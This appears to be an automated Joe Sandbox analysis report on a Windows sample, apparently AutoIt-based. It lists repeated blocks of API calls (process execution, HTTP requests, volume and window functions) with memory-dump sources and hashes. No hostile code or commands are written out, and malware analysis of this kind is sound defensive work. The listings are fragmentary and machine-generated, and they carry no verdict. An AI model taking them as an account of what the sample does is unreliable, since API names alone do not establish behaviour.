                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: \$]$h
                                                                                                                                        • API String ID: 4104443479-3262404753
                                                                                                                                        • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                                                        • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                                                                                        • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                                                        • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                                                                                        APIs
                                                                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                                                        • String ID: <$@
                                                                                                                                        • API String ID: 2417854910-1426351568
                                                                                                                                        • Opcode ID: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                                                                                                        • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                                                                        • Opcode Fuzzy Hash: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                                                                                                        • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                                                                                        APIs
                                                                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                                                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3705125965-3916222277
                                                                                                                                        • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                                                        • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                                                                                        • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                                                        • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                                                                                        APIs
                                                                                                                                        • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                                                                                        • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                                                                                        • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Delete$InfoItem
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 135850232-4108050209
                                                                                                                                        • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                                                        • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                                                                                        • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                                                        • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                                                                                        APIs
                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Long
                                                                                                                                        • String ID: SysTreeView32
                                                                                                                                        • API String ID: 847901565-1698111956
                                                                                                                                        • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                                                        • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                                                                                        • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                                                        • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                                                                                        • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                        • String ID: AU3_GetPluginDetails
                                                                                                                                        • API String ID: 145871493-4132174516
                                                                                                                                        • Opcode ID: 159cfda42166365942fc35f4e8310eed724addc4652cab969a8521ebf27062eb
                                                                                                                                        • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                                                                                        • Opcode Fuzzy Hash: 159cfda42166365942fc35f4e8310eed724addc4652cab969a8521ebf27062eb
                                                                                                                                        • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window
                                                                                                                                        • String ID: SysMonthCal32
                                                                                                                                        • API String ID: 2326795674-1439706946
                                                                                                                                        • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                                                        • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                                                                                        • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                                                        • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                                                                                        APIs
                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DestroyWindow
                                                                                                                                        • String ID: msctls_updown32
                                                                                                                                        • API String ID: 3375834691-2298589950
                                                                                                                                        • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                                        • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                                                                                        • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                                        • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: $<
                                                                                                                                        • API String ID: 4104443479-428540627
                                                                                                                                        • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                                                        • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                                                                                        • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                                                        • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                        • String ID: \VH
                                                                                                                                        • API String ID: 1682464887-234962358
                                                                                                                                        • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                                                        • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                                                                                        • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                                                        • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                        • String ID: \VH
                                                                                                                                        • API String ID: 1682464887-234962358
                                                                                                                                        • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                                        • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                                                                                        • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                                                        • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                        • String ID: \VH
                                                                                                                                        • API String ID: 1682464887-234962358
                                                                                                                                        • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                                        • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                                                                                        • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                                        • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$InformationVolume
                                                                                                                                        • String ID: \VH
                                                                                                                                        • API String ID: 2507767853-234962358
                                                                                                                                        • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                                        • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                                                                                        • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                                        • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$InformationVolume
                                                                                                                                        • String ID: \VH
                                                                                                                                        • API String ID: 2507767853-234962358
                                                                                                                                        • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                                        • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                                                                                        • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                                        • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                                                                                        APIs
